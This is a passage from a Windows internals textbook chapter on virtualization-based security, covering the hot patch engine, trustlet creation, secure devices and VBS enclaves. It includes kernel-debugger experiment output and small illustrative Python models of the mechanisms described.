age’s NAR (see the previous section, “The Secure Kernel memory manager” for more details about the
NARs), which also tells the Secure Kernel whether the image is protected by PatchGuard. The Secure
Kernel then verifies whether enough reserved space is available in the image HPAT. If so, it allocates
one or more free physical pages (getting them from the secure bundle or using the
ALLOC_PHYSICAL_PAGES normal call) that will be mapped in the reserved space. At this point, if the base image is
protected, the Secure Kernel starts a complex process that updates the PatchGuard's internal state for the
new patched image and finally calls the patch engine.
The kernel's patch engine performs the following high-level operations, which are all described by a
different entry type in the hot patch table:
1. Patches all calls from patched functions in the patch image so that they jump to the corresponding functions in the base image. This ensures that all unpatched code always executes in the original base image. For example, if function A calls B in the base image and the patch changes function A but not function B, then the patch engine will update function B in the patch to jump to function B in the base image.
2. Patches the necessary references to global variables in patched functions to point to the corresponding global variables in the base image.
3. Patches the necessary import address table (IAT) references in the patch image by copying the corresponding IAT entries from the base image.
4. Atomically patches the necessary functions in the base image to jump to the corresponding function in the patch image. As soon as this is done for a given function in the base image, all new invocations of that function will execute the new patched function code in the patch image. When the patched function returns, it will return to the caller of the original function in the base image.
Since the pointers of the new functions are 64 bits (8 bytes) wide, the patch engine inserts each
pointer in the HPAT, which is located at the end of the binary. In this way, it needs only 5 bytes for placing
the indirect jump in the padding space located at the beginning of each function. (The process has
been simplified here; Retpoline-compatible hot patches require a compatible Retpoline routine, and the
HPAT is split into code and data pages.)
As shown in Figure 9-38, the patch engine is compatible with different kinds of binaries. If the NT
kernel has not found any patchable kernel mode module, it restarts the search through all the user
mode processes and applies a similar procedure to hot patch a compatible user-mode executable
or library.
[Figure content: the patch engine loads the patch binary, points patched functions to the patch binary atomically, and unpatched code always executes in the original binary; the schema shows patches applied to user-mode DLLs in several processes, kernel drivers, Ntoskrnl.exe in VTL 0, and SecureKernel.exe in VTL 1.]

FIGURE 9-38 A schema of the hot patch engine executing on different types of binaries.
Isolated User Mode
Isolated User Mode (IUM), the services provided by the Secure Kernel to its secure processes (trustlets),
and the trustlets' general architecture are covered in Chapter 3 of Part 1. In this section, we continue
the discussion starting from there, and we move on to describe some services provided by the Isolated
User Mode, like the secure devices and the VBS enclaves.
As introduced in Chapter 3 of Part 1, when a trustlet is created in VTL 1, it usually maps in its address
space the following libraries:
• Iumdll.dll  The IUM Native Layer DLL implements the secure system call stub. It's the equivalent of Ntdll.dll in VTL 0.
• Iumbase.dll  The IUM Base Layer DLL is the library that implements most of the secure APIs that can be consumed exclusively by VTL 1 software. It provides various services to each secure process, like secure identification, communication, cryptography, and secure memory management. Trustlets do not usually call secure system calls directly; they go through Iumbase.dll, which is the equivalent of Kernelbase.dll in VTL 0.
• IumCrypt.dll  Exposes public/private key encryption functions used for signing and integrity verification. Most of the crypto functions exposed to VTL 1 are implemented in Iumbase.dll; only a small number of specialized encryption routines are implemented in IumCrypt. LsaIso is the main consumer of the services exposed by IumCrypt, which is not loaded in many other trustlets.
• Ntdll.dll, Kernelbase.dll, and Kernel32.dll  A trustlet can be designed to run in both VTL 1 and VTL 0. In that case, it should only use routines implemented in the standard VTL 0 API surface. Not all the services available to VTL 0 are also implemented in VTL 1. For example, a trustlet can never do any registry I/O or any file I/O, but it can use synchronization routines, ALPC, thread APIs, and structured exception handling, and it can manage virtual memory and section objects. Almost all the services offered by the Kernelbase and Kernel32 libraries perform system calls through Ntdll.dll. In VTL 1, these kinds of system calls are "translated" into normal calls and redirected to the VTL 0 kernel. (We discussed normal calls in detail earlier in this chapter.) Normal calls are often used by IUM functions and by the Secure Kernel itself. This explains why Ntdll.dll is always mapped into every trustlet.
• Vertdll.dll  The VSM enclave runtime DLL manages the lifetime of a VBS enclave. Only limited services are provided to software executing in a secure enclave. This library implements all the enclave services exposed to the software enclave and is normally not loaded in standard VTL 1 processes.
With this knowledge in mind, let's look at what is involved in the trustlet creation process, starting
from the CreateProcess API in VTL 0, whose execution flow has already been described in detail
in Chapter 3.
Trustlets creation
As discussed multiple times in the previous sections, the Secure Kernel depends on the NT kernel for per-
forming various operations. Creating a trustlet follows the same rule: It is an operation that is managed
by both the Secure Kernel and NT kernel. In Chapter 3 of Part 1, we presented the trustlet structure and
its signing requirement, and we described its important policy metadata. Furthermore, we described the
detailed flow of the CreateProcess API, which is still the starting point for the trustlet creation.
To properly create a trustlet, an application should specify the CREATE_SECURE_PROCESS creation flag
when calling the CreateProcess API. Internally, the flag is converted to the PS_CP_SECURE_PROCESS
NT attribute and passed to the NtCreateUserProcess native API. After NtCreateUserProcess has
successfully opened the image to be executed, it creates the section object of the image by specifying
a special flag, which instructs the memory manager to use the Secure HVCI to validate its content. This
allows the Secure Kernel to create the SECURE_IMAGE data structure used to describe the PE image
verified through Secure HVCI.
The NT kernel creates the required process’s data structures and initial VTL 0 address space (page
directories, hyperspace, and working set) as for normal processes, and if the new process is a trustlet, it
emits a CREATE_PROCESS secure call. The Secure Kernel manages the latter by creating the secure pro-
cess object and relative data structure (named SEPROCESS). The Secure Kernel links the normal process
object (EPROCESS) with the new secure one and creates the initial secure address space by allocating
the secure page table and duplicating the root entries that describe the kernel portion of the secure
address space in the upper half of it.
The NT kernel concludes the setup of the empty process address space and maps the Ntdll library
into it (see Stage 3D of Chapter 3 of Part 1 for more details). When doing so for secure processes, the
NT kernel invokes the INITIALIZE_PROCESS secure call to finish the setup in VTL 1. The Secure Kernel
copies the trustlet identity and trustlet attributes specified at process creation time into the new secure
process, creates the secure handle table, and maps the secure shared page into the address space.
The last step needed for the secure process is the creation of the secure thread. The initial thread
object is created as for normal processes in the NT kernel: When the NtCreateUserProcess calls
PspInsertThread, it has already allocated the thread kernel stack and inserted the necessary data to
start from the KiStartUserThread kernel function (see Stage 4 in Chapter 3 of Part 1 for further de-
tails). If the process is a trustlet, the NT kernel emits a CREATE_THREAD secure call for performing the
final secure thread creation. The Secure Kernel attaches to the new secure process’s address space
and allocates and initializes a secure thread data structure, a thread’s secure TEB, and kernel stack.
The Secure Kernel fills the thread's kernel stack by inserting the thread's first initial kernel routine:
SkpUserThreadStart. It then initializes the machine-dependent hardware context for the secure thread,
which specifies the actual image start address and the address of the first user mode routine. Finally, it
associates the normal thread object with the newly created secure one, inserts the thread into the secure
threads list, and marks the thread as runnable.
When the normal thread object is selected to run by the NT kernel scheduler, the execution still
starts in the KiStartUserThread function in VTL 0. The latter lowers the thread's IRQL and calls the
system initial thread routine (PspUserThreadStartup). The execution proceeds as for normal threads until
the point where the NT kernel would set up the initial thunk context. Instead of doing that, it starts the
Secure Kernel dispatch loop by calling the VslpEnterIumSecureMode routine and specifying the
RESUMETHREAD secure call.
The loop will exit only when the thread is terminated. The initial secure call is processed by the normal
call dispatcher loop in VTL 1, which identifies the “resume thread” entry reason to VTL 1, attaches to
the new process’s address space, and switches to the new secure thread stack. The Secure Kernel in
this case does not call the IumInvokeSecureService dispatcher function because it knows that the initial
thread function is on the stack, so it simply returns to the address located in the stack, which points to
the VTL 1 secure initial routine, SkpUserThreadStart.
SkpUserThreadStart, similarly to standard VTL 0 threads, sets up the initial thunk context to run the im-
age loader initialization routine (LdrInitializeThunk in Ntdll.dll), as well as the system-wide thread startup
stub (RtlUserThreadStart in Ntdll.dll). These steps are done by editing the context of the thread in place
and then issuing an exit from system service operation, which loads the specially crafted user context and
returns to user mode. The newborn secure thread initialization proceeds as for normal VTL 0 threads; the
LdrInitializeThunk routine initializes the loader and its needed data structures. Once the function returns,
NtContinue restores the new user context. Thread execution now truly starts: RtlUserThreadStart uses the
address of the actual image entry point and the start parameter and calls the application’s entry point.
Note A careful reader may have noticed that the Secure Kernel doesn’t do anything to pro-
tect the new trustlet’s binary image. This is because the shared memory that describes the
trustlet’s base binary image is still accessible to VTL 0 by design.
Let’s assume that a trustlet wants to write private data located in the image’s global data.
The PTEs that map the writable data section of the image global data are marked as copy-
on-write. So, an access fault will be generated by the processor. The fault belongs to a user
mode address range (remember that no NAR are used to track shared pages). The Secure
Kernel page fault handler transfers the execution to the NT kernel (through a normal call),
which will allocate a new page, copy the content of the old one in it, and protect it through
the SLAT (using a protected copy operation; see the section “The Secure Kernel memory
manager” earlier in this chapter for further details).
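The fault-handling sequence in the note can be modeled in miniature. The following is a conceptual simulation, not Secure Kernel code — the CowPage class and all its names are invented for illustration: on the first write to a shared frame, a new private frame is allocated, the old contents are copied into it, and the writer’s mapping is switched to the copy.

```python
# Conceptual model of the copy-on-write handling described above.
# "Pages" are byte buffers, and the write path stands in for the NT
# kernel allocating a new page, copying the old one, and reprotecting
# it through the SLAT. Purely illustrative.

class CowPage:
    def __init__(self, data):
        self.frames = {0: bytes(data)}   # frame 0 holds the shared image page
        self.mapping = {}                # process id -> frame number
        self.next_frame = 1

    def map(self, pid):
        """Initially every process maps the shared, read-only frame."""
        self.mapping[pid] = 0

    def write(self, pid, offset, value):
        """A write to the shared frame 'faults' and gets a private copy."""
        if self.mapping[pid] == 0:       # shared -> allocate + copy (fault path)
            self.frames[self.next_frame] = bytearray(self.frames[0])
            self.mapping[pid] = self.next_frame
            self.next_frame += 1
        self.frames[self.mapping[pid]][offset] = value

    def read(self, pid, offset):
        return self.frames[self.mapping[pid]][offset]

page = CowPage(b"\x00" * 16)
page.map(pid=1)
page.map(pid=2)
page.write(1, 0, 0xAA)                   # process 1 faults, gets a private copy
```

After the write, process 1 sees its private copy while process 2 still maps the untouched shared frame.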
EXPERIMENT: Debugging a trustlet
Debugging a trustlet with a user mode debugger is possible only if the trustlet explicitly allows it
through its policy metadata (stored in the .tPolicy section). In this experiment, we try to debug a
trustlet through the kernel debugger. You need a kernel debugger attached to a test system (a lo-
cal kernel debugger works, too), which must have VBS enabled. HVCI is not strictly needed, though.
First, find the LsaIso.exe trustlet:
lkd> !process 0 0 lsaiso.exe
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
Analyzing the process’s PEB reveals that some information is set to 0 or nonreadable:
lkd> .process /P ffff8904dfdaa080
lkd> !peb 8074164000
PEB at 0000008074164000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: No
ImageBaseAddress: 00007ff708750000
NtGlobalFlag: 0
NtGlobalFlag2: 0
Ldr 0000000000000000
*** unable to read Ldr table at 0000000000000000
SubSystemData: 0000000000000000
ProcessHeap: 0000000000000000
ProcessParameters: 0000026b55a10000
CurrentDirectory: 'C:\Windows\system32\'
WindowTitle: '< Name not readable >'
ImageFile: '\??\C:\Windows\system32\lsaiso.exe'
CommandLine: '\??\C:\Windows\system32\lsaiso.exe'
DllPath: '< Name not readable >'
Reading from the process image base address may succeed, but it depends on whether the
LsaIso image mapped in the VTL 0 address space has been already accessed. This is usually the
case just for the first page (remember that the shared memory of the main image is accessible in
VTL 0). In our system, the first page is mapped and valid, whereas the third one is invalid:
lkd> db 0x7ff708750000 l20
00007ff7`08750000 4d 5a 90 00 03 00 00 00-04 00 00 00 ff ff 00 00 MZ..............
00007ff7`08750010 b8 00 00 00 00 00 00 00-40 00 00 00 00 00 00 00 ........@.......
lkd> db (0x7ff708750000 + 2000) l20
00007ff7`08752000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
00007ff7`08752010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????
lkd> !pte (0x7ff708750000 + 2000)
VA 00007ff708752000
PXE at FFFFD5EAF57AB7F8 PPE at FFFFD5EAF56FFEE0 PDE at FFFFD5EADFFDC218
contains 0A0000003E58D867 contains 0A0000003E58E867 contains 0A0000003E58F867
pfn 3e58d ---DA--UWEV pfn 3e58e ---DA--UWEV pfn 3e58f ---DA--UWEV
PTE at FFFFD5BFFB843A90
contains 0000000000000000
not valid
Dumping the process’s threads reveals important information that confirms what we have
discussed in the previous sections:
!process ffff8904dfdaa080 2
PROCESS ffff8904dfdaa080
SessionId: 0 Cid: 02e8 Peb: 8074164000 ParentCid: 0250
DirBase: 3e590002 ObjectTable: ffffb00d0f4dab00 HandleCount: 42.
Image: LsaIso.exe
THREAD ffff8904dfdd9080 Cid 02e8.02f8 Teb: 0000008074165000
Win32Thread: 0000000000000000 WAIT: (UserRequest) UserMode Non-Alertable
ffff8904dfdc5ca0 NotificationEvent
THREAD ffff8904e12ac040 Cid 02e8.0b84 Teb: 0000008074167000
Win32Thread: 0000000000000000 WAIT: (WrQueue) UserMode Alertable
ffff8904dfdd7440 QueueObject
lkd> .thread /p ffff8904e12ac040
Implicit thread is now ffff8904`e12ac040
Implicit process is now ffff8904`dfdaa080
.cache forcedecodeuser done
lkd> k
*** Stack trace for last set context - .thread/.cxr resets it
# Child-SP          RetAddr           Call Site
00 ffffe009`1216c140 fffff801`27564e17 nt!KiSwapContext+0x76
01 ffffe009`1216c280 fffff801`27564989 nt!KiSwapThread+0x297
02 ffffe009`1216c340 fffff801`275681f9 nt!KiCommitThreadWait+0x549
03 ffffe009`1216c3e0 fffff801`27567369 nt!KeRemoveQueueEx+0xb59
04 ffffe009`1216c480 fffff801`27568e2a nt!IoRemoveIoCompletion+0x99
05 ffffe009`1216c5b0 fffff801`2764d504 nt!NtWaitForWorkViaWorkerFactory+0x99a
06 ffffe009`1216c7e0 fffff801`276db75f nt!VslpDispatchIumSyscall+0x34
07 ffffe009`1216c860 fffff801`27bab7e4 nt!VslpEnterIumSecureMode+0x12098b
08 ffffe009`1216c8d0 fffff801`276586cc nt!PspUserThreadStartup+0x178704
09 ffffe009`1216c9c0 fffff801`27658640 nt!KiStartUserThread+0x1c
0a ffffe009`1216cb00 00007fff`d06f7ab0 nt!KiStartUserThreadReturn
0b 00000080`7427fe18 00000000`00000000 ntdll!RtlUserThreadStart
The stack clearly shows that the execution begins in VTL 0 at the KiStartUserThread routine.
PspUserThreadStartup has invoked the secure call dispatch loop, which never ended and has
been interrupted by a wait operation. There is no way for the kernel debugger to show any
Secure Kernel’s data structures or trustlet’s private data.
Secure devices
VBS provides the ability for drivers to run part of their code in the secure environment. The Secure
Kernel itself can’t be extended to support kernel drivers; its attack surface would become too large.
Furthermore, Microsoft wouldn’t allow external companies to introduce possible bugs in a component
used primarily for security purposes.
The User-Mode Driver Framework (UMDF) solves the problem by introducing the concept of driver
companions, which can run either in VTL 0 or in VTL 1 user mode. In the latter case, they take the name of secure
companions. A secure companion takes the subset of the driver’s code that needs to run in a different
mode (in this case IUM) and loads it as an extension, or companion, of the main KMDF driver. Standard
WDM drivers are also supported, though. The main driver, which still runs in VTL 0 kernel mode, contin-
ues to manage the device’s PnP and power state, but it needs the ability to reach out to its companion
to perform tasks that must be performed in IUM.
Although the Secure Driver Framework (SDF) mentioned in Chapter 3 is deprecated, Figure 9-39
shows the architecture of the new UMDF secure companion model, which is still built on top of the
same UMDF core framework (Wudfx02000.dll) used in VTL 0 user mode. The latter leverages services
provided by the UMDF secure companion host (WUDFCompanionHost.exe) for loading and managing
the driver companion, which is distributed through a DLL. The UMDF secure companion host manag-
es the lifetime of the secure companion and encapsulates many UMDF functions that deal specifically
with the IUM environment.
FIGURE 9-39 The WDF driver’s secure companion architecture. (The figure shows the KMDF driver and the KMDF core framework in VTL 0 kernel mode, the UMDF driver manager service in VTL 0 user mode, and the driver companion — linked against the WDF binding stub library and the UMDF core framework — hosted by the UMDF SecureHost trustlet in VTL 1 user mode; the components communicate through ALPC.)
A secure companion usually comes associated with the main driver that runs in the VTL 0 kernel. It
must be properly signed (including the IUM EKU in the signature, as for every trustlet) and must de-
clare its capabilities in its metadata section. A secure companion has the full ownership of its managed
device (this explains why the device is often called a secure device). A secure device controlled by a secure
companion supports the following features:
- Secure DMA  The driver can instruct the device to perform DMA transfers directly into protected VTL 1 memory, which is not accessible to VTL 0. The secure companion can process the data sent or received through the DMA interface and can then transfer part of the data to the VTL 0 driver through the standard KMDF communication interface (ALPC). The IumGetDmaEnabler and IumDmaMapMemory secure system calls, exposed through Iumbase.dll, allow the secure companion to map physical DMA memory ranges directly in VTL 1 user mode.
- Memory-mapped I/O (MMIO)  The secure companion can request the device to map its accessible MMIO range in VTL 1 (user mode). It can then access the memory-mapped device’s registers directly in IUM. The MapSecureIo and ProtectSecureIo APIs expose this feature.
- Secure sections  The companion can create (through the CreateSecureSection API) and map secure sections, which represent memory that can be shared between trustlets and the main driver running in VTL 0. Furthermore, the secure companion can specify a different type of SLAT protection in case the memory is accessed through the secure device (via DMA or MMIO).
A secure companion can’t directly respond to device interrupts, which need to be mapped and
managed by the associated kernel mode driver in VTL 0. In the same way, the kernel mode driver still
needs to act as the high-level interface for the system and user mode applications by managing all the
received IOCTLs. The main driver communicates with its secure companion by sending WDF tasks using
the UMDF Task Queue object, which internally uses the ALPC facilities exposed by the WDF framework.
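The task-based communication just described can be sketched as a tiny model. Everything here is illustrative — TaskQueue and its handler are invented names, not WDF APIs: the VTL 0 driver enqueues tasks, and the companion drains the queue and returns completions, much as the WDFTASKQUEUE object delivers tasks over ALPC.

```python
# Toy model of the driver <-> secure-companion task queue described above.
# Tasks flow one way (VTL 0 kernel driver -> VTL 1 companion) and results
# come back as completions. Not real WDF code.

from collections import deque

class TaskQueue:
    def __init__(self, handler):
        self.pending = deque()
        self.handler = handler          # the companion's task callback

    def send_task(self, task):
        """Called by the VTL 0 driver; queues work for the companion."""
        self.pending.append(task)

    def drain(self):
        """Companion side: process every queued task, collect completions."""
        completions = []
        while self.pending:
            completions.append(self.handler(self.pending.popleft()))
        return completions

# A hypothetical companion handler that transforms each payload in IUM.
queue = TaskQueue(handler=lambda task: ("done", task.upper()))
queue.send_task("encrypt-block-0")
queue.send_task("encrypt-block-1")
results = queue.drain()
```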
A typical KMDF driver registers its companion via INF directives. WDF automatically starts the driver’s
companion in the context of the driver’s call to WdfDeviceCreate—which, for plug and play drivers usually
happens in the AddDevice callback—by sending an ALPC message to the UMDF driver manager service,
which spawns a new WUDFCompanionHost.exe trustlet by calling the NtCreateUserProcess native API.
The UMDF secure companion host then loads the secure companion DLL in its address space. Another
ALPC message is sent from the UMDF driver manager to the WUDFCompanionHost, with the goal to ac-
tually start the secure companion. The DriverEntry routine of the companion performs the driver’s secure
initialization and creates the WDFDRIVER object through the classic WdfDriverCreate API.
The framework then calls the AddDevice callback routine of the companion in VTL 1, which usually
creates the companion’s device through the new WdfDeviceCompanionCreate UMDF API. The latter
transfers the execution to the Secure Kernel (through the IumCreateSecureDevice secure system call),
which creates the new secure device. From this point on, the secure companion has full ownership of its
managed device. Usually, the first thing that the companion does after the creation of the secure de-
vice is to create the task queue object (WDFTASKQUEUE) used to process any incoming tasks delivered
by its associated VTL 0 driver. The execution control returns to the kernel mode driver, which can now
send new tasks to its secure companion.
This model is also supported by WDM drivers. WDM drivers can use the KMDF’s miniport mode to
interact with a special filter driver, WdmCompanionFilter.sys, which is attached in a lower-level position
of the device’s stack. The Wdm Companion filter allows WDM drivers to use the task queue object for
sending tasks to the secure companion.
VBS-based enclaves
In Chapter 5 of Part 1, we discuss the Software Guard Extensions (SGX), a hardware technology that allows
the creation of protected memory enclaves, which are secure zones in a process address space where
code and data are protected (encrypted) by the hardware from code running outside the enclave. The
technology, which was first introduced in the sixth generation Intel Core processors (Skylake), has suf-
fered from some problems that prevented its broad adoption. (Furthermore, AMD released another
technology called Secure Encrypted Virtualization, which is not compatible with SGX.)
To overcome these issues, Microsoft released VBS-based enclaves, which are secure enclaves whose
isolation guarantees are provided using the VSM infrastructure. Code and data inside of a VBS-based
enclave is visible only to the enclave itself (and the VSM Secure Kernel) and is inaccessible to the NT
kernel, VTL 0 processes, and secure trustlets running in the system.
A secure VBS-based enclave is created by establishing a single virtual address range within a normal
process. Code and data are then loaded into the enclave, after which the enclave is entered for the first
time by transferring control to its entry point via the Secure Kernel. The Secure Kernel first verifies that
all code and data are authentic and are authorized to run inside the enclave by using image signature
verification on the enclave image. If the signature checks pass, then the execution control is transferred
to the enclave entry point, which has access to all of the enclave’s code and data. By default, the system
only supports the execution of enclaves that are properly signed. This precludes the possibility that un-
signed malware can execute on a system outside the view of anti-malware software, which is incapable
of inspecting the contents of any enclave.
During execution, control can transfer back and forth between the enclave and its containing pro-
cess. Code executing inside of an enclave has access to all data within the virtual address range of the
enclave. Furthermore, it has read and write access to the containing unsecure process address space. All
memory within the enclave’s virtual address range will be inaccessible to the containing process. If mul-
tiple enclaves exist within a single host process, each enclave will be able to access only its own memory
and the memory that is accessible to the host process.
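These visibility rules can be condensed into a small access-check model. This is purely conceptual — the real isolation is enforced through SLAT protections, not a function like this:

```python
# Conceptual model of the VBS-enclave visibility rules described above:
# an enclave can touch its own range and the host's ordinary memory;
# the host (and any other enclave) cannot touch the enclave's range.

def can_access(accessor, target, enclaves):
    """accessor/target: 'host' or an enclave name present in `enclaves`."""
    if target == "host":
        return True                    # host memory is visible to everyone
    if accessor == "host":
        return False                   # host cannot look inside any enclave
    return accessor == target          # an enclave sees only its own range

enclaves = {"A", "B"}                  # two enclaves in one host process
```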
As for hardware enclaves, when code is running in an enclave, it can obtain a sealed enclave report,
which can be used by a third-party entity to validate that the code is running with the isolation guar-
antees of a VBS enclave, and which can further be used to validate the specific version of code running.
This report includes information about the host system, the enclave itself, and all DLLs that may have
been loaded into the enclave, as well as information indicating whether the enclave is executing with
debugging capabilities enabled.
A VBS-based enclave is distributed as a DLL, which has certain specific characteristics:
- It is signed with an Authenticode signature, and the leaf certificate includes a valid EKU that permits the image to be run as an enclave. The root authority that has emitted the digital certificate should be Microsoft, or a third-party signing authority covered by a certificate manifest that’s countersigned by Microsoft. This implies that third-party companies can sign and run their own enclaves. Valid digital signature EKUs are the IUM EKU (1.3.6.1.4.1.311.10.3.37) for internal Windows-signed enclaves or the Enclave EKU (1.3.6.1.4.1.311.10.3.42) for all third-party enclaves.
- It includes an enclave configuration section (represented by an IMAGE_ENCLAVE_CONFIG data structure), which describes information about the enclave and which is linked to its image’s load configuration data directory.
- It includes the correct Control Flow Guard (CFG) instrumentation.
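Certificates carry EKUs as DER-encoded object identifiers. As a side note, the two OID values quoted above can be rendered into their wire form with a short sketch (standard ASN.1 OID contents-octet encoding; not Windows code):

```python
# DER-encode an OBJECT IDENTIFIER value (contents octets only), using the
# standard ASN.1 rules: the first two arcs fuse into one byte (40*a + b),
# and every later arc is base-128 with the high bit set on all but the
# last octet.

def encode_oid(dotted):
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append((arc & 0x7F) | 0x80)
            arc >>= 7
        out.extend(reversed(chunk))
    return bytes(out)

# The two EKUs quoted above:
ium_eku     = encode_oid("1.3.6.1.4.1.311.10.3.37")
enclave_eku = encode_oid("1.3.6.1.4.1.311.10.3.42")
```

The Microsoft arc 311 needs two octets (0x82 0x37), which is why both encodings are ten bytes long.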
The enclave’s configuration section is important because it includes important information needed
to properly run and seal the enclave: the unique family ID and image ID, which are specified by the
enclave’s author and identify the enclave binary, the secure version number and the enclave’s policy
information (like the expected virtual size, the maximum number of threads that can run, and the
debuggability of the enclave). Furthermore, the enclave’s configuration section includes the list of
images that may be imported by the enclave, included with their identity information. An enclave’s
imported module can be identified by a combination of the family ID and image ID, or by a combina-
tion of the generated unique ID, which is calculated starting from the hash of the binary, and author ID,
which is derived from the certificate used to sign the enclave. (This value expresses the identity of who
has constructed the enclave.) The imported module descriptor must also include the minimum secure
version number.
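The fields enumerated above can be mirrored with a struct format string as a sketch of that layout. The field order follows the IMAGE_ENCLAVE_CONFIG64 declaration in winnt.h; treat the exact format string as an assumption to verify against your SDK headers. Its 0x50-byte size matches the `00000050 size` value reported by the link.exe dump in the experiment that follows.

```python
# Sketch of the IMAGE_ENCLAVE_CONFIG64 layout (as declared in winnt.h),
# expressed as a struct format string. Field order: Size,
# MinimumRequiredConfigSize, PolicyFlags, NumberOfImports, ImportList (RVA),
# ImportEntrySize, FamilyID[16], ImageID[16], ImageVersion, SecurityVersion,
# EnclaveSize, NumberOfThreads, EnclaveFlags.

import struct

ENCLAVE_CONFIG64 = "<6I16s16s2IQ2I"   # little-endian, no implicit padding

def parse_enclave_config(blob):
    fields = struct.unpack_from(ENCLAVE_CONFIG64, blob)
    names = ("Size", "MinimumRequiredConfigSize", "PolicyFlags",
             "NumberOfImports", "ImportList", "ImportEntrySize",
             "FamilyID", "ImageID", "ImageVersion", "SecurityVersion",
             "EnclaveSize", "NumberOfThreads", "EnclaveFlags")
    return dict(zip(names, fields))
```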
The Secure Kernel offers some basic system services to enclaves through the VBS enclave runtime
DLL, Vertdll.dll, which is mapped in the enclave address space. These services include: a limited subset
of the standard C runtime library, the ability to allocate or free secure memory within the address range
of the enclave, synchronization services, structured exception handling support, basic cryptographic
functions, and the ability to seal data.
EXPERIMENT: Dumping the enclave configuration
In this experiment, we use the Microsoft Incremental linker (link.exe) included in the Windows
SDK and WDK to dump software enclave configuration data. Both packages are downloadable
from the web. You can also use the EWDK, which contains all the necessary tools and does not
require any installation. It’s available at https://docs.microsoft.com/en-us/windows-hardware/
drivers/download-the-wdk.
Open the Visual Studio Developer Command Prompt through the Cortana search box or
by executing the LaunchBuildEnv.cmd script file contained in the EWDK’s Iso image. We will
analyze the configuration data of the System Guard Routine Attestation enclave—which is
shown in Figure 9-40 and will be described later in this chapter—with the link.exe /dump
/loadconfig command:
The command’s output is large. So, in the example shown in the preceding figure, we have
redirected it to the SgrmEnclave_secure_loadconfig.txt file. If you open the new output file, you
see that the binary image contains a CFG table and includes a valid enclave configuration pointer,
which targets the following data:
Enclave Configuration
00000050 size
0000004C minimum required config size
00000000 policy flags
00000003 number of enclave import descriptors
0004FA04 RVA to enclave import descriptors
00000050 size of an enclave import descriptor
00000001 image version
00000001 security version
0000000010000000 enclave size
00000008 number of threads
00000001 enclave flags
family ID : B1 35 7C 2B 69 9F 47 F9 BB C9 4F 44 F2 54 DB 9D
image ID : 24 56 46 36 CD 4A D8 86 A2 F4 EC 25 A9 72 02
ucrtbase_enclave.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : F0 3C CD A7 E8 7B 46 EB AA E7 1F 13 D5 CD DE 5D
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
bcrypt.dll
0 minimum security version
0 reserved
match type : image ID
family ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
image ID : 20 27 BD 68 75 59 49 B7 BE 06 34 50 E2 16 D7 ED
unique/author ID : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
...
The configuration section contains the binary image’s enclave data (like the family ID, image
ID, and security version number) and the import descriptor array, which tells the
Secure Kernel which libraries the main enclave binary can safely depend on. You can redo
the experiment with the Vertdll.dll library and with all the binaries imported from the System
Guard Routine Attestation enclave.
Enclave lifecycle
In Chapter 5 of Part 1, we discussed the lifecycle of a hardware enclave (SGX-based). The lifecycle of a
VBS-based enclave is similar; Microsoft has enhanced the already available enclave APIs to support the
new type of VBS-based enclaves.
Step 1: Creation An application creates a VBS-based enclave by specifying the ENCLAVE_TYPE_VBS
flag to the CreateEnclave API. The caller should specify an owner ID, which identifies the owner of
the enclave. The enclave creation code, in the same way as for hardware enclaves, ends up calling the
NtCreateEnclave in the kernel. The latter checks the parameters, copies the passed-in structures, and
attaches to the target process in case the enclave is to be created in a different process than the caller’s.
The MiCreateEnclave function allocates an enclave-type VAD describing the enclave virtual memory
range and selects a base virtual address if not specified by the caller. The kernel allocates the memory
manager’s VBS enclave data structure and the per-process enclave hash table, used for fast lookup of
an enclave by its number. If the enclave is the first created for the process, the system also cre-
ates an empty secure process (which acts as a container for the enclaves) in VTL 1 by using the CREATE
_PROCESS secure call (see the earlier section “Trustlets creation” for further details).
The CREATE_ENCLAVE secure call handler in VTL 1 performs the actual work of the enclave creation:
it allocates the secure enclave key data structure (SKMI_ENCLAVE), sets the reference to the container
secure process (which has just been created by the NT kernel), and creates the secure VAD describ-
ing the entire enclave virtual address space (the secure VAD contains similar information to its VTL 0
counterpart). This VAD is inserted in the containing process’s VAD tree (and not in the enclave itself).
An empty virtual address space for the enclave is created in the same way as for its containing process:
the page table root is filled by system entries only.
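The bookkeeping in this step can be sketched as a toy model. All names here are invented, not NT kernel code: the first enclave created in a process also creates the empty VTL 1 container, and each enclave is registered in a per-process table keyed by its number for fast lookup.

```python
# Toy model of the Step 1 bookkeeping described above: the first enclave
# created in a process also creates the (empty) VTL 1 container process;
# later enclaves reuse it. Enclaves are registered in a per-process table
# keyed by enclave number. Purely illustrative.

class Process:
    def __init__(self):
        self.enclave_table = {}        # enclave number -> enclave record
        self.secure_container = None   # the VTL 1 secure process, if any
        self.next_number = 1

    def create_enclave(self, base, size):
        if self.secure_container is None:        # first enclave: make container
            self.secure_container = {"kind": "secure-process", "enclaves": 0}
        number = self.next_number
        self.next_number += 1
        self.enclave_table[number] = {"base": base, "size": size}
        self.secure_container["enclaves"] += 1
        return number

proc = Process()
first = proc.create_enclave(base=0x026D_0820_0000, size=0x1000_0000)
second = proc.create_enclave(base=0x0300_0000_0000, size=0x1000_0000)
```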
Step 2: Loading modules into the enclave Unlike hardware-based enclaves, the parent
process can load only modules into the enclave, not arbitrary data. This will cause each page of the
image to be copied into the address space in VTL 1. Each image’s page in the VTL 1 enclave will be a
private copy. At least one module (which acts as the main enclave image) needs to be loaded into the
enclave; otherwise, the enclave can’t be initialized. After the VBS enclave has been created, an applica-
tion calls the LoadEnclaveImage API, specifying the enclave base address and the name of the module
